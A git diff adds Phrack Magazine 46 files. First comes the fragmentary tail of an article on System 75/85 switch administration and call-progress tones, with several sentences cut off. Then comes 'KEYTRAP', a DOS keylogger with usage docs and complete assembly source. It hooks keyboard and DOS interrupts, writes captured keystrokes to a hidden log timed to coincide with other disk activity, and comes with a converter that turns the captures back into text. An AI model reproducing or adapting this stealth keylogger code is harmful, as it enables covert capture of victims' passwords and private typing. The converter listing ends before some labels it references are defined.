+The System comes with switched services software, administrative software,
+and maintenance software.  All running on a real-time operating system.
+
+  and services.  This also is responsible for relaying any information to the
+  console display.
+  tasks, and configurations.
+  keep everything running properly.
+
+=====================
+System Administration
+=====================
+
+The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
+number. The pound (#) and star (*) keys can be used as the first digit of the
+code.  Below you will see a typical Screen Format taken from one of my logs,
+information aside you can see and get a feel of what the administration side of
+the system is like.                                                                            Page 1 of 4
+
+                               STATION
+
+Extension: ____
+Type: _____       Lock Messages: _      COR: _     Room: _____
+Port: ___________ Security Code: ____   COS: _     Jack: _____
+Name: ___________ Coverage Path: ___              Cable: _____
+
+FEATURE OPTIONS
+
+    LWC Reception? _____  Headset? _  Coverage Msg Retrieval? _
+   LWC Activation? _  Auto Answer? _        Data Restriction? _
+ Redirect Notification? _        Idle Appearance Preferences? _
+PCOL/TEG Call Alerting? _
+           Data Module? _           Restrict Last Appearance? _
+               Display? _
+
+ABBREVIATED DIALINGS
+
+        List1: _____        List2: _____        List3: _____
+
+BUTTON ASSIGNMENTS
+
+1: _______                     6: _______
+2: _______                     7: _______
+3: _______                     8: _______
+4: _______                     9: _______
+5: _______
+
+
+==================
+System Maintenance
+==================
+
+Finally the Maintenance section, where you can see where the errors are
+logged, where all the alarms are sent, printed, etc.
+
+There are 3 different types of alarms:
+  console or INADS)
+
+The Error log is reported and can be viewed at The Manager Terminal,
+as well as the alarm log.
+
+==============
+Basic Acronyms
+==============
+
+ADU     Asynchronous Data Unit
+AUDIX   Audio Information Exchange
+COR     Class of Restriction
+COS     Class of Service
+DCP     Digital Communications Protocol
+DMI     Digital Multiplexed Interface
+EPN     Expansion Port Network
+ISDN    Integrated Service Digital Network
+PPN     Processor Post Network
+PSDN    Packet Switching Data Network
+
+=====
+Tones
+=====
+
+Here is most of the Tones, mostly either interesting ones or often used
+tones the System.  Here are the tones, the frequencies, and the moderations.
+
+Tone                   Frequency          Pattern
+----                   ---------          -------
+Answer Back 3          2225 Hz            3000 on
+Answer Back 5          2225 Hz            5000 on
+Bridging Warning       440 Hz             1750 on, 12000 off,
+                                          650 on; repeated
+Busy                   480 Hz + 620 Hz    500 on, 500 off; repeated
+Call Waiting
+ Internal              440 Hz             200 on
+ External              440 Hz             200 on, 200 off
+ Attendant             440 Hz             200 on, 200 off
+Priority Call          440 Hz             200 on, 200 off, 200 on,
+                                          200 off, 200 on
+Call Waiting
+ Ring Back             440 Hz + 480 Hz;   900 on (440 + 480)
+                       440 Hz             200 on (440) 2900 off; repeated
+Cnrt Att Call
+ Incoming Call
+ Identification       480 Hz & 440 Hz    100 on (480), 100 on (440),
+                       & 480 Hz           100 on silence;
+ Dial Zero,
+ Attendant Transfer,
+ Test Calls,           440 Hz             100 on, 100 off, 100 on
+ Coverage              440 Hz             600 on
+ Confirmation          350 Hz + 400 Hz    100 on, 100 off, 100 on,
+                                          100 off, 100 on
+ Dial                  250 Hz + 400 Hz    Continuous
+ Executive Override    440 Hz             300 on followed by
+ Intercept             440 Hz & 620 Hz    250 on (440),
+                                          250 on (620); repeated
+ Ringback              440 Hz + 480 Hz    1000 on, 3000 off; repeated
+ Zip                   480                500 on
+
+=====
+Outro
+=====
+
+  System 75/85 (multi-carrier cabinet model) communications system.
+
+I hope you learned something, anywayz, questions comments, system login
+information, defaults, where to get manuals, or anything else:
+email me (armitage@dhp.com) and I will get back to you.
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a
+
+mQCNAi4sHnsAAAEEALjw8E+bOEr1BlCyrBp8f3Ko8yOX5P5uiP+Vor5SamJ33gbu
+PBSBOc+Xww+93Pjl/R7gMC/c/FFtn+ehHsCm5u3AaIXSmx2ZVW2Xen9vXBRMZRB+
+rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9NqW4m70tndGYkB59slAAUT
+tAdFcnVkaXRl
+=Nx+g
+-----END PGP PUBLIC KEY BLOCK-----
+
+erudite (armitage@dhp.com) (armitage on irc)
diff --git a/phrack46/26.txt b/phrack46/26.txt
new file mode 100644
index 0000000..6d98bd1
--- /dev/null
+++ b/phrack46/26.txt
@@ -0,0 +1,918 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 26 of 28
+
+****************************************************************************
+
+                   KEYTRAP v1.0 - Keyboard Key Logger
+                      by Dcypher (Dcypher@aol.com)
+
+
+-------------------------------------------------------------------------
+THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR
+FOREIGN LAW.  THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS
+TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW !
+-------------------------------------------------------------------------
+You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the
+above limitations, and provided all files are included in unmodified
+form; KEYTRAP.EXE, KEYTRAP.DOC
+-------------------------------------------------------------------------
+The author disclaims ALL warranties relating to the program, whether
+express or implied.  In absolutely no event shall the author be liable
+for any damage resulting from the use and/or misuse of this program.
+-------------------------------------------------------------------------
+
+
+
+
+WHAT IS KEYTRAP ?
+~~~~~~~~~~~~~~~~~
+KEYTRAP is a very effective keyboard key logger that will log
+keyboard scancodes to a logfile for later conversion to ASCII
+characters. Keytrap installs as a TSR, remaining in memory
+until the computer is turned off.
+
+CONVERT will convert the keyboard scancodes captured by Keytrap
+to their respective keyboard (ASCII) characters.
+
+
+Usage: KEYTRAP <dir\logfile> /A /B /C
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+A - Maximum size of logfile
+B - Number of keys to log per session
+C - Number of minutes between each session
+
+Keytrap is a command line program.
+
+<dir\logfile> - You MUST specify a directory for the logfile.
+If you don't specify a directory Keytrap will only look in the
+current directory for the logfile. If the logfile is not found
+in the current directory no writing will occur. Keytrap will
+append the scancode data to the end of the file you specify.
+
+A - The Maximum size of the logfile. This number is checked only
+when Keytrap is installed. If the size of the logfile exceeds this
+number, Keytrap will delete the logfile and create a new one.
+
+B - This is the number of keys to log per session. Keytrap will
+only check this number AFTER a write to the logfile. So if you
+specify 50 keys, and Keytrap does not get a chance to write till
+there are 100 keys in the buffer, then Keytrap will log 100 keys.
+
+C - This is the number of minutes between each session. When Keytrap
+reaches or exceeds the number of keys to log per session, it will
+start a delay routine and check this number. You can't specify more
+then 1440 minutes, the number of minutes in a day !
+
+Example: KEYTRAP c:\logfile /20000 /200 /20
+
+Keytrap will check "logfile" to see if it exceeds 20,000
+bytes. If it does, Keytrap will delete the log file and then
+create a new one. Keytrap will then install as a TSR program.
+It will log approx 200 keys at a time with a delay of 20 minutes
+between each session.
+
+
+Usage: CONVERT logfile outfile
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+logfile: The file that contains the scancodes that Keytrap logged.
+outfile: Specify an output file name.
+
+Theres not too much to say here. This program just converts scancodes
+from the logfile into their respective keyboard (ASCII) characters.
+
+
+NOTES
+~~~~~
+Keytrap will not display ANY messages. Check the logfile and
+the size of the logfile if your not sure Keytrap is working.
+
+Keytrap will only make the logfile hidden if the logfile is
+actually created by Keytrap or the maximum size of the logfile
+is reached or exceeded. If you specify a file that already
+exists then Keytrap will not change that files attributes and
+will append all scancode data to the end of the file.
+
+Keytrap will not crash if the logfile gets deleted while Keytrap
+is in memory. It will just keep looking for the logfile so it can
+write its buffer. A buffer write is not forced until the buffer
+reaches 400 bytes. It will then try to write its buffer during
+the next interrupt 21 call.
+
+-------------------------------------------------------------------------
+
+If you have any questions or need some help, e-mail me.
+Below is my public pgp key, don't e-mail me without it !
+
+                             Dcypher (Dcypher@aol.com)
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.6
+
+mQCNAi3iD5cAAAEEAMVJGdgCYzG5av0lLSjO7iXm64qsuk6v/dx5XcMoNmOHNUA3
++tzF0WuVPXuJ59mFxE3/rhQqyh8Mci0f4qT6TR7FfSb8vtzSkF5vW8cNUmQx8Qvf
+B/YQZVmztNlWOPROAmT8ZHbsrNev2rgeYjouW3ZOUgA4RKBRYiCTuXD+VOlxAAUR
+tBlEY3lwaGVyIDxEY3lwaGVyQGFvbC5jb20+
+=w2RN
+-----END PGP PUBLIC KEY BLOCK-----
+
+*****************************************************************************
+
+;
+;
+; KEYTRAP v1.0 - Keyboard Key Logger
+; By Dcypher (Dcypher@aol.com)
+;
+; Usage: KEYTRAP <dir\logfile> /A /B /C
+;
+;        A - Maximum size of log file.
+;        B - Number of keys to log per session.
+;        C - Minutes between each session.
+;
+;------------------------------------------------
+      ;
+ .286                                    ; 286 or better
+ .model small                            ;
+ .code                                   ;
+ org     100h                            ;
+      ;
+begin:  jmp     install    ;
+      ;
+;================================================
+      ;
+db      ' DCYPHER@AOL.COM / KEYTRAP V1.0 ' ; PLEASE DON'T REMOVE
+      ;
+buf             db 401 dup (0)                  ; 400 byte buffer
+bufptr          dw 0                            ;  +1 for luck :)
+      ;
+hide            db 0    ; save int21 function call
+stimem          dw 0    ; grab time when done
+handle          dw 0                            ; logfile handle
+control         db 0    ; control which INT to use
+done_flag       db 0    ; session done flag
+must_write      db 0                            ; must-write flag
+write_amount    dw 0                            ; amount written to disk
+using_21        db 0    ; already doing an int-21
+      ;
+old_9a_off      dw 0    ;
+old_9a_seg      dw 0                            ;
+      ;
+old_9b_off      dw 0    ;
+old_9b_seg      dw 0                            ;
+      ;
+old_21_off      dw 0                            ;
+old_21_seg      dw 0                            ;
+      ;
+datasegm        dw 0                            ; save data-segment
+      ;
+delaym          dw 0    ; delay, in minutes
+mkeys           dw 0                            ; maximum number of keys
+logH            dw 0                            ; log file size
+logL            dw 0                            ; log file size
+      ;
+;==============================================================================
+      ;
+int_9A: pushf                                   ;
+ pusha                                   ;
+ push    es     ;
+        push    ds                              ;
+ mov     ds, datasegm                    ; we are here
+      ;
+ cmp     control, 1   ; use this one ?
+        je      A91    ;
+        call    pkey    ; process key (scancode)
+        ;
+   A91: pop     ds                              ;
+ pop     es                              ;
+ popa                                    ;
+ popf                                    ;
+ jmp     dword ptr old_9a_off            ;
+      ;
+;================================================
+      ;
+  pkey: cmp     done_flag, 1                    ; completely done ?
+ je      pk2                             ;
+ cmp     bufptr, 400                     ; buffer limit reached ?
+ jae     pk2                             ;
+      ;
+ in      al, 60h                         ; get scancode
+      ;
+ cmp     al, 39h                         ; get downstroke and only
+ ja      pk2                             ; as far as spacebar
+        cmp     al, 2Ah    ;
+        je      pk2    ; no shift
+        cmp     al, 36h    ;
+        je      pk2    ; no shift
+      ;
+        push    0    ;
+        pop     es    ;
+        mov     ah, byte ptr es:[417h]  ; shift status
+        test    ah, 43h    ; test for both shift keys
+        je      pk1           ; and cap-lock active
+      ;
+        add     al, 80h    ; show shift or cap-lock
+   pk1: mov     di, bufptr                      ; in logfile
+ mov     buf[di], al                     ; place scancode in buffer
+ inc     di                              ;
+ mov     bufptr, di                      ;
+        mov     must_write, 1      ; try to write buffer
+      ;
+   pk2: ret     ;
+      ;
+;================================================
+      ;
+int_9B: pushf                                   ;
+ pusha                                   ;
+ push    es                              ;
+ push    ds                              ;
+ mov     ds, datasegm                    ; we are here
+      ;
+        cmp     control, 0   ; use this one ?
+        je      B91       ; (not really needed)
+        call    pkey    ; process a key (scancode)
+      ;
+   B91: pop     ds                              ;
+ pop     es    ;
+ popa                                    ;
+ popf                                    ;
+ jmp     dword ptr old_9b_off            ;
+      ;
+;==============================================================================
+      ;
+int_21: pushf                                   ;
+ pusha                                   ;
+ push    es                              ;
+ push    ds                              ;
+ mov     ds, datasegm                    ; here we are
+      ;
+        cmp     ax, 0ffffh   ; check if already installed
+        je      D21    ;
+      ;
+ cmp     using_21, 1                     ; might need to call an
+ je      C21                             ; int-21 here so jump if
+ mov     using_21, 1                     ; called from below
+        mov     hide, ah   ; save function # for hiding
+      ;
+        call    switch     ; always control the int 9's
+        call    timer    ; always check restart timer
+      ;
+ cmp     done_flag, 1                    ; completely done ?
+ je      B21                             ;
+ cmp     must_write, 1                   ; need to write ?
+ jne     B21                             ;
+        cmp     bufptr, 400   ; push a write when buffer
+        jae     A21    ; is full
+      ;
+        cmp     hide, 3Fh    ; disk read
+        je      A21    ; (hide buffer write)
+        cmp     hide, 40h    ; disk write
+        je      A21    ;
+        jmp     B21    ; can't hide, try another time
+      ;
+   A21: call    saveb                           ; write buffer
+      ;
+   B21: mov     using_21, 0                     ; no int-21 calls anymore
+   C21: pop     ds                              ;
+ pop     es                              ;
+ popa                                    ;
+ popf                                    ;
+ jmp     dword ptr old_21_off            ;
+;------------------------------------------------
+   D21: pop ds    ; already installed !
+        pop es    ;
+        popa     ;
+        popf     ;
+        mov     ax, 1    ; show installed
+        iret     ;
+      ;
+;==============================================================================
+      ;
+timer:  cmp     done_flag, 0   ; only check time when
+ je      timerb    ; session is complete !
+      ;
+        mov     ah, 2Ch    ;
+        int     21h    ; what's the time ?
+        mov     al, ch    ;
+        xor     ah, ah    ;
+        mov     bx, 60    ;
+        mul     bx    ; multiply hours by 60
+        xor     ch, ch    ;
+        add     ax, cx    ; add in the minutes
+           ;
+        mov     bx, stimem   ;
+        cmp     ax, bx    ; is time now same as
+        je      timerb    ; when session was completed
+      ; if so, don't do anything
+        xor     cx, cx    ;
+timer1: cmp     bx, 1440   ; midnight then back to 0
+        jb      timer2    ;
+        xor     bx, bx    ;
+timer2: inc     cx    ; minutes counter
+        inc     bx    ;
+        cmp     ax, bx    ; count until time now
+        jne     timer1    ;
+      ;
+        cmp     cx, delaym   ;
+        jb      timerb    ; should we reset ?
+      ;
+        mov     done_flag, 0   ; reset / next session
+timerb: ret     ;
+      ;
+;------------------------------------------------
+      ;
+switch: mov     ax, 3509h                       ;
+ int     21h                             ;
+ cmp     bx, offset int_9A               ; everything ok with 9A ?
+ jne     sw1                             ; check offset
+        mov     control, 0   ; show who has control
+        ret            ;
+                ;
+   sw1: cmp     control, 1   ; 9B already in use ?
+        je      sw2    ; yes, don't do anything
+        mov     ax, 3509h   ;
+        int     21h    ;
+        mov     old_9b_seg, es   ;
+        mov     old_9b_off, bx   ;
+        mov     ax, 2509h   ;
+        lea     dx, int_9B   ;
+        int     21h    ; use 9B instead of 9A !
+        mov     control, 1   ; show who has control
+   sw2: ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+saveb:  mov     ax, 3d01h                       ;
+ mov     dx, 82h                         ;
+ int     21h                             ; open logfile, r/w
+ jc      probw                           ;
+ mov     handle, ax                      ;
+ mov     bx, ax                          ;
+ mov     ax, 4202h                       ;
+ xor     cx, cx                          ;
+ xor     dx, dx                          ;
+ int     21h                             ; point to eof
+ jc      probw                           ;
+ mov     ah, 40h                         ;
+ mov     bx, handle                      ;
+ mov     cx, bufptr                      ;
+ lea     dx, buf                         ;
+ int     21h                             ; write buffer
+ jc      probw                           ;
+ mov     ah, 3Eh                         ;
+ mov     bx, handle                      ;
+ int     21h                             ; close logfile
+ jc      probw                           ;
+;------------------------------------------------
+ mov     cx, bufptr                      ; no problems writing
+ add     write_amount, cx                ; so add to written amount
+      ;
+ mov     cx, mkeys                       ; check number of keys logged
+ cmp     write_amount, cx                ; all done ?
+ jb      donew                           ;
+      ;
+ mov     done_flag, 1                    ; show session complete
+        mov     write_amount, 0   ; written amount to 0
+        call    gtime    ; grab stop time [minutes]
+      ;
+donew:  mov     must_write, 0                   ; no need to write anymore
+ mov     bufptr, 0                       ; buffer pointer back to 0
+probw:  ret                                     ; try again another time
+      ; (if problem writing)
+;------------------------------------------------
+      ;
+gtime:  mov     ah, 2Ch    ; DONE
+        int     21h    ; grab time in minutes
+        mov     al, ch    ;
+        xor     ah, ah    ;
+        mov     bx, 60    ;
+        mul     bx    ; multiply hours by 60
+        xor     ch, ch    ;
+        add     ax, cx    ; add in the minutes
+        mov     stimem, ax   ; start time in minutes
+        ret     ;
+      ;
+;==============================================================================
+;==============================================================================
+      ;
+install:mov     bx, 80h                         ;
+ cmp     byte ptr [bx], 0                ; any parameters ?
+ je      bye                             ;
+      ;
+        mov   ax, 0ffffh   ;
+        int     21h    ; already installed ?
+        cmp     ax, 1    ;
+        je      bye    ;
+      ;
+ call    conv                            ; convert command line numbers
+ jc      bye                             ;
+        call    clog    ; check or create logfile
+      ;
+        mov     ax, 3509h                       ;
+ int     21h                             ;
+ mov     old_9a_off, bx                  ; save old int 9
+ mov     old_9a_seg, es                  ;
+ mov     ah, 25h                         ;
+ lea     dx, int_9A                      ;
+ int     21h                             ; hook only 9A to start
+      ;
+ mov     ax, 3521h                       ;
+ int     21h                             ;
+ mov     old_21_off, bx                  ; save old int 21
+ mov     old_21_seg, es                  ;
+ mov     ah, 25h                         ;
+ lea     dx, int_21                      ;
+ int     21h                             ; point to new int 21
+      ;
+        mov     datasegm, ds   ; save this data segment area
+      ; for later use in the ISR's
+ mov     bx, offset install              ;
+ mov     ax, 3100h                       ;
+ mov     dx, bx                          ;
+ mov     cl, 04h                         ;
+ shr     dx, cl                          ;
+ inc     dx                              ;
+ int     21h                             ; end / save above install
+      ;
+   bye: mov ah, 4Ch    ; no installation
+        int     21h    ; just end
+      ;
+;==============================================================================
+      ;
+  conv: push    ds                              ; convert command line options
+ pop     es                              ;
+ mov     di, 81h                         ;
+ conv1: inc     di                              ;
+ cmp     byte ptr [di], 2fh              ; point to first "/"
+ jnz     conv1                           ;
+ inc     di                              ; point to first number
+ call    mconv                           ; convert it
+ jc      conv4                           ; any problems ?
+ mov     logH, dx                        ;
+ mov     logL, cx                        ; save max logfile size
+        add     cx, dx    ;
+        cmp     cx, 0    ; make sure not 0
+        je      conv4    ;
+      ;
+ dec     di                              ;
+conv2:  inc     di                              ;
+ cmp     byte ptr [di], 2fh              ; point to second "/"
+ jnz     conv2                           ;
+ inc     di                              ; point to first number
+ call    mconv                           ; convert it
+ jc      conv4                           ; any problems ?
+        cmp     dx, 0    ; bigger then 65535 ?
+        ja      conv4    ;
+ mov     mkeys, cx                       ; save key limit
+      ;
+ dec     di                              ;
+conv3:  inc     di                              ;
+ cmp     byte ptr [di], 2fh              ; point to third "/"
+ jnz     conv3                           ;
+ inc     di                              ; point to first number
+ call    mconv                           ; convert it
+ jc      conv4                           ; any problems ?
+        cmp     dx, 0    ;
+        ja      conv4     ; bigger then 65535 end
+        cmp     cx, 1440   ;
+        ja      conv4    ; bigger then 1440 end
+        mov     delaym, cx   ; save session delay time
+        clc     ; show no problems
+        ret     ;
+conv4:  stc     ; show problem
+        ret     ;
+      ;
+;------------------------------------------------
+      ;
+ mconv: xor     cx, cx                          ; main converter
+ mov     dx, cx                          ; no comments here, all I
+ mov     ah, ch                          ; know is that it works ! :)
+ cld                                     ;
+ dec     di                              ;
+ convl: inc     di                              ;
+ mov     al, es:[di]                     ; convert number at es:[di]
+ xor     al, '0'                         ;
+ cmp     al, 10                          ; carry flag will be set
+ jae     convD                           ; if theres a problem
+ shl     cx, 1                           ;
+ rcl     dx, 1                           ;
+ jc      convD                           ;
+ mov     bx, cx                          ;
+ mov     si, dx                          ;
+ shl     cx, 1                           ;
+ rcl     dx, 1                           ;
+ jc      convD                           ;
+ shl     cx, 1                           ;
+ rcl     dx, 1                           ;
+ jc      convD                           ;
+ add     cx, bx                          ;
+ adc     dx, si                          ;
+ jc      convD                           ;
+ add     cl, al                          ;
+ adc     ch, 0                           ;
+ adc     dx, 0                           ;
+ jc      convD                           ;
+ jmp     convl                           ;
+convD: ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+  clog: mov     bx, 82h                         ; point to logfile
+ null1: cmp     byte ptr [bx], 20h              ; find first space
+ je      null2                           ;
+ inc     bx                              ;
+ jmp     null1                           ;
+ null2: mov     byte ptr [bx], 0                ; replace space with 0
+      ;
+        mov   ax, 3D01h   ;
+        mov     dx, 82h    ;
+        int     21h    ; open the file
+        jc      clog3    ;
+        mov     handle, ax   ; good open, save handle
+      ;
+        mov     ax, 4202h                       ;
+ mov     bx, handle                      ;
+ xor     cx, cx                          ;
+ xor     dx, dx                          ;
+ int     21h                             ; mov pointer to eof
+      ;
+ cmp     logH, dx                        ; check size
+ ja      clog4                           ; size ok
+ cmp     logH, dx                        ;
+ je      clog1                           ;
+ jmp     clog2                           ; must be below, not ok
+ clog1: cmp     logL, ax                        ;
+ ja      clog4                           ; size ok
+      ;
+ clog2: mov     ax, 4301h                       ;
+ mov     dx, 82h                         ;
+ xor     cx, cx                          ;
+ int     21h                             ; change file mode
+ mov     ah, 41h                         ;
+ mov     dx, 82h                         ;
+ int     21h                             ; delete file
+      ;
+ clog3: mov     ah, 3Ch    ; create new
+        mov     cx, 02h    ; (hidden)
+        mov     dx, 82h    ;
+        int     21h    ;
+        mov     handle, ax   ;
+      ;
+ clog4: mov     bx, handle   ; close logfile handle
+        mov     ah, 3Eh    ;
+        int     21h    ;
+        ret     ;
+      ;
+;==============================================================================
+
+end     begin
+
+*****************************************************************************
+
+;
+;
+; CONVERT v1.0 - Keytrap logfile converter
+; By Dcypher@aol.com
+;
+; Usage: CONVERT logfile outfile
+;
+;        logfile - Keytrap's scancode data (logfile)
+;        outfile - Specify an output file name
+;
+;
+;----------------------------------------
+     ;
+ .286                            ;
+ .model  small                   ;
+ .code                           ;
+ org     100h                    ;
+     ;
+start:  jmp     go                      ;
+     ;
+;----------------------------------------
+     ;
+inhandle        dw 0                    ;
+inpointH        dw 0                    ;
+inpointL        dw 0                    ;
+loaded          dw 0                    ;
+last            db 0                    ;
+     ;
+outhandle       dw 0                    ;
+outoffset       dw 0                    ;
+     ;
+;----------------------------------------
+     ;
+table   db 002h, '1'                    ; scan-code table
+ db 003h, '2'                    ;
+ db 004h, '3'                    ;
+ db 005h, '4'                    ;
+ db 006h, '5'                    ;
+ db 007h, '6'                    ;
+ db 008h, '7'                    ;
+ db 009h, '8'                    ;
+ db 00Ah, '9'                    ;
+ db 00Bh, '0'                    ;
+ ;                               ;
+ db 082h, '!'                    ;
+ db 083h, '@'                    ;
+ db 084h, '#'                    ;
+ db 085h, '$'                    ;
+ db 086h, '%'                    ;
+ db 087h, '^'                    ;
+ db 088h, '&'                    ;
+ db 089h, '*'                    ;
+ db 08Ah, '('                    ;
+ db 08Bh, ')'                    ;
+;----------------------------------------
+ db 01Eh, 'a'                    ;
+ db 030h, 'b'                    ;
+ db 02Eh, 'c'                    ;
+ db 020h, 'd'                    ;
+ db 012h, 'e'                    ;
+ db 021h, 'f'                    ;
+ db 022h, 'g'                    ;
+ db 023h, 'h'                    ;
+ db 017h, 'i'                    ;
+ db 024h, 'j'                    ;
+ db 025h, 'k'                    ;
+ db 026h, 'l'                    ;
+ db 032h, 'm'                    ;
+ db 031h, 'n'                    ;
+ db 018h, 'o'                    ;
+ db 019h, 'p'                    ;
+ db 010h, 'q'                    ;
+ db 013h, 'r'                    ;
+ db 01Fh, 's'                    ;
+ db 014h, 't'                    ;
+ db 016h, 'u'                    ;
+ db 02Fh, 'v'                    ;
+ db 011h, 'w'                    ;
+ db 02Dh, 'x'                    ;
+ db 015h, 'y'                    ;
+ db 02Ch, 'z'                    ;
+ ;                               ;
+ db 09Eh, 'A'                    ;
+ db 0B0h, 'B'                    ;
+ db 0AEh, 'C'                    ;
+ db 0A0h, 'D'                    ;
+ db 092h, 'E'                    ;
+ db 0A1h, 'F'                    ;
+ db 0A2h, 'G'                    ;
+ db 0A3h, 'H'                    ;
+ db 097h, 'I'                    ;
+ db 0A4h, 'J'                    ;
+ db 0A5h, 'K'                    ;
+ db 0A6h, 'L'                    ;
+ db 0B2h, 'M'                    ;
+ db 0B1h, 'N'                    ;
+ db 098h, 'O'                    ;
+ db 099h, 'P'                    ;
+ db 090h, 'Q'                    ;
+ db 093h, 'R'                    ;
+ db 09Fh, 'S'                    ;
+ db 094h, 'T'                    ;
+ db 096h, 'U'                    ;
+ db 0AFh, 'V'                    ;
+ db 091h, 'W'                    ;
+ db 0ADh, 'X'                    ;
+ db 095h, 'Y'                    ;
+ db 0ACh, 'Z'                    ;
+;----------------------------------------
+ db 00Ch, '-'                    ;
+ db 08Ch, '_'                    ;
+     ;
+ db 00Dh, '='                    ;
+ db 08Dh, '+'                    ;
+     ;
+ db 01Ah, '['                    ;
+ db 09Ah, '{'                    ;
+     ;
+ db 01Bh, ']'                    ;
+ db 09Bh, '}'                    ;
+     ;
+ db 027h, ';'                    ;
+ db 0A7h, ':'                    ;
+     ;
+ db 028h, 027h                   ; '
+ db 0A8h, '"'                    ;
+     ;
+ db 033h, ','                    ;
+ db 0B3h, '<'                    ;
+     ;
+ db 034h, '.'                    ;
+ db 0B4h, '>'                    ;
+     ;
+ db 035h, '/'                    ;
+ db 0B5h, '?'                    ;
+     ;
+ db 02Bh, '\'                    ;
+ db 0ABh, '|'                    ;
+     ;
+ db 037h, '*'                    ;
+ db 0B7h, '*'                    ;
+     ;
+ db 029h, '`'                    ;
+ db 0A9h, '~'                    ;
+     ;
+;----------------------------------------
+     ;
+ db 039h, 020h                   ; space
+ db 0B9h, 020h                   ; space with shift
+     ;
+ db 00Eh, 011h                   ; backspace
+ db 08Eh, 011h                   ; backspace with shift
+     ;
+ db 01Ch, 00Ah                   ; return
+ db 09Ch, 00Ah                   ; return with shift
+     ;
+ db 0                            ; End of Table
+     ;
+;==============================================================================
+      ;
+ fprob: mov     ah, 9                           ;
+ lea     dx, ferr                        ;
+ int     21h                             ;
+ jmp     bye                             ;
+      ;
+prtuse: mov     ah, 9                           ;
+ lea     dx, usage                       ;
+ int     21h                             ;
+      ;
+   bye: mov     ah, 4Ch                         ;
+ int     21h                             ;
+      ;
+;------------------------------------------------
+      ;
+    go: mov     ah, 9                           ;
+ lea     dx, namver                      ;
+ int     21h                             ;
+      ;
+ mov     bx, 80h                         ;
+ cmp     byte ptr [bx], 0                ;
+ je      prtuse                          ;
+      ;
+ call    null                            ;
+ call    check                           ;
+ jc      fprob                           ;
+      ;
+   go1: call    ldata                           ;
+ call    conv                            ;
+ call    sdata                           ;
+ cmp     last, 1                         ;
+ jne     go1                             ;
+ jmp     bye                             ;
+      ;
+;------------------------------------------------
+      ;
+  null: mov     bx, 81h                         ;
+ null1: inc     bx                              ;
+ cmp     byte ptr [bx], 20h              ;
+ jnz     null1                           ;
+ mov     byte ptr [bx], 0                ;
+      ;
+ mov     outoffset, bx                   ;
+ inc     word ptr [outoffset]            ;
+      ;
+ null2: inc     bx                              ;
+ cmp     byte ptr [bx], 0Dh              ;
+ jnz     null2                           ;
+ mov     byte ptr [bx], 0                ;
+ ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+check:  mov     ax, 3D00h                       ;
+ mov     dx, 82h                         ;
+ int     21h                             ;
+ jc      check2                          ;
+ mov     bx, ax                          ;
+ mov     ah, 3Eh                         ;
+ int     21h                             ;
+ jc      check2                          ;
+      ;
+ mov     ah, 3Ch                         ;
+ xor     cx, cx                          ;
+ mov     dx, outoffset                   ;
+ int     21h                             ;
+ jc      check2                          ;
+ mov     bx, ax                          ;
+ mov     ah, 3Eh                         ;
+ int     21h                             ;
+ jc      check2                          ;
+      ;
+ clc                                     ;
+check2: ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+ ldata: mov     ax, 3D00h                       ;
+ mov     dx, 82h                         ;
+ int     21h                             ;
+ mov     inhandle, ax                    ;
+      ;
+ mov     ax, 4200h                       ;
+ mov     bx, inhandle                    ;
+ mov     cx, inpointH                    ;
+ mov     dx, inpointL                    ;
+ int     21h                             ;
+      ;
+ mov     ah, 3Fh                         ;
+ mov     bx, inhandle                    ;
+ mov     cx, 60000                       ;
+ lea     dx, eof                         ;
+ int     21h                             ;
+ mov     loaded, ax                      ;
+ cmp     ax, 60000                       ;
+ je      ldata2                          ;
+ mov     last, 1                         ;
+      ;
+ldata2: mov     ax, 4201h                       ;
+ mov     bx, inhandle                    ;
+ xor     cx, cx                          ;
+ xor     dx, dx                          ;
+ int     21h                             ;
+ mov     inpointH, dx                    ;
+ mov     inpointL, ax                    ;
+      ;
+ mov     ah, 3Eh                         ;
+ mov     bx, inhandle                    ;
+ int     21h                             ;
+ ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+  conv: mov     cx, loaded                      ;
+ lea     si, eof                         ;
+      ;
+ conv1: lea     di, table                       ;
+      ;
+ cmp     cx, 0                           ;
+ je      conv6                           ;
+      ;
+ mov     al, byte ptr [si]               ;
+ conv2: mov     ah, byte ptr [di]               ;
+ cmp     ah, 0                           ;
+ je      conv4                           ;
+ cmp     ah, al                          ;
+ je      conv3                           ;
+ add     di, 2                           ;
+ jmp     conv2                           ;
+      ;
+ conv3: inc     di                              ;
+ mov     al, byte ptr [di]               ;
+ mov     byte ptr [si], al               ;
+ dec     cx                              ;
+ inc     si                              ;
+ jmp     conv1                           ;
+      ;
+ conv4: mov     byte ptr [si], 20h              ;
+ dec     cx                              ;
+ inc     si                              ;
+ jmp     conv1                           ;
+      ;
+ conv6: ret                                     ;
+      ;
+;------------------------------------------------
+      ;
+sdata:  mov     ax, 3D02h                       ;
+ mov     dx, outoffset                   ;
+ int     21h                             ;
+ mov     outhandle, ax                   ;
+      ;
+ mov     ax, 4202h                       ;
+ mov     bx, outhandle                   ;
+ xor     cx, cx                          ;
+ xor     dx, dx                          ;
+ int     21h                             ;
+      ;
+ mov     ah, 40h                         ;
+ mov     bx, outhandle                   ;
+ mov     cx, loaded                      ;
+ lea     dx, eof                         ;
+ int     21h                             ;
+      ;
+ mov     ah, 3Eh                         ;
+ mov     bx, outhandle                   ;
+ int     21h                             ;
+ ret                                     ;
+      ;
+;------------------------------------------------------------------------------
+
+namver  db 10,13
+ db 'CONVERT v1.0',10,13
+ db 'Keytrap logfile converter.',10,13
+ db 'By Dcypher (Dcypher@aol.com)',10,13
+ db 10,13,'$'
+
